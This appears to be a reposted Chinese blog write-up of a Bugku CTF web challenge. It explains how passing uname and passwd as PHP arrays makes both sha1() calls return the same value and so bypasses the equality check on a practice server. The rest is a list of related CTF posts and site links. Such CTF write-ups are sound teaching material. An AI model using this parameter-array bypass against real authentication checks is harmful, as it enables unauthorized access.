Bugku-CTF之各种绕过

其他 2019-05-27 00:19:01 阅读次数: 0

Day28

各种绕过

各种绕过哟

http://123.206.87.240:8002/web7/

本题要点：php代码审计、hackbar利用

阅读代码发现

只要使uname的sha1的值与passwd的sha1的值相等即可，但是同时他们两个的值又不能相等

构造

http://123.206.87.240:8002/web7/ ?uname[]=1&id=margin 并发送 passwd[]=2 的 postdata 请求即可

完成！

猜你喜欢

转载自www.cnblogs.com/0yst3r-2046/p/10928402.html

Bugku-CTF之各种绕过

Bugku-CTF之矛盾

bugku(各种绕过 110)-CTF

bugku-CTF之web基础$_POST

bugku-CTF之web基础

Bugku-CTF之速度要快

Bugku-CTF之cookies欺骗

Bugku-CTF之你从哪里来

Bugku-CTF之flag在index里

Bugku-CTF之输入密码查看flag

Bugku-CTF之点击一百万次

Bugku-CTF之备份是个好习惯

Bugku-CTF之看看源代码吧

Bugku-CTF之细心 (想办法变成admin)

Bugku-CTF之web8（txt？？？？）

Bugku-CTF之文件包含2 (150)

Bugku-CTF社工篇之简单的社工尝试

Bugku-CTF加密篇之富强民主

Bugku-CTF逆向篇之Easy_vb

Bugku-CTF逆向篇之入门逆向

Bugku-CTF之多次

Bugku-CTF之变量1

Bugku-CTF练习平台 WEB flag

Bugku-CTF之你必须让他停下+头等舱

Bugku-CTF之管理员系统+程序员本地网站

Bugku-CTF之成绩单（快来查查成绩吧）

Bugku-CTF之flag.php（点了login咋没反应）

Bugku-CTF之welcome to bugkuctf（php://filter和php://input的妙用）

Bugku-CTF之这是一个神奇的登陆框

Bugku-CTF之sql注入2 （全都tm过滤了绝望吗？）

今日推荐

《美国对全球网络空间安全与发展的威胁和破坏》报告发布

火速冲上 GitHub 热榜 —— 开源编程语言、框架哪有这么可爱？

北京人形机器人创新中心发布全球首个纯电驱拟人奔跑的全尺寸人形机器人“天工”

LFOSSA 源来如此公开课 | 掌握云原生未来：CNCF 认证全面攻略与备考秘籍

周排行

循环神经网络（rnn）讲解

Tigao教程四：单独的关节运动

金蝶K3WISE15.0-注册套打教程

如何在Mac上配置Kubernetes

Android应用结束自身进程的方法

SpringMVC学习十三拦截器栈

中国驻洛杉矶总领馆举行新春招待会

HttpClient get post 发送

11 - three.js 笔记 - 绘制三维字体模型

Mysql递归获取某个父节点下面的所有子节点和子节点上的所有父节点

每日归档

更多

2024-05-01(4)

2024-04-30(1)

2024-04-29(40)

2024-04-28(0)

2024-04-27(56)

2024-04-26(39)

2024-04-25(22)

2024-04-24(36)

2024-04-23(26)

2024-04-22(39)